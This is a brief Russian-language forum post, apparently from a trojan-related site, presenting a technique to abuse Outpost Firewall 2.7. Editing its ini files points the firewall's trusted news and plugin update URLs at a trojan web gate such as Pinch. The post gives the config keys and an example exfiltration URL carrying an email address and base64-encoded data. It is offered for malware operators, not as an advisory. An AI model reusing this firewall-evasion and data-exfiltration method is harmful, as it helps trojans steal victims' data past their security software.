Уязвимость Outpost Firewall 2.7. Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для ru-язычной версии)
x:\...\Outpost Firewall\outpost.ini
x:\...\Outpost Firewall\op_links.iniКод:[HttpAlerts] ... NewsTime=10 //таймаут NewsEnable=yes //меню->сервис->загружать новости PluginsTime=10 //таймаут PluginsEnable=yes //меню->сервис->загружать информацию о модулях ...
При этом Outpost выдает предупреждение о том, что его главный модуль пытается соединиться с внешним миром, но это выглядит достаточно безобидно.Код:NewsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data PluginsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data PluginsPageAdv_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
Источник: pinch.xakepy.ru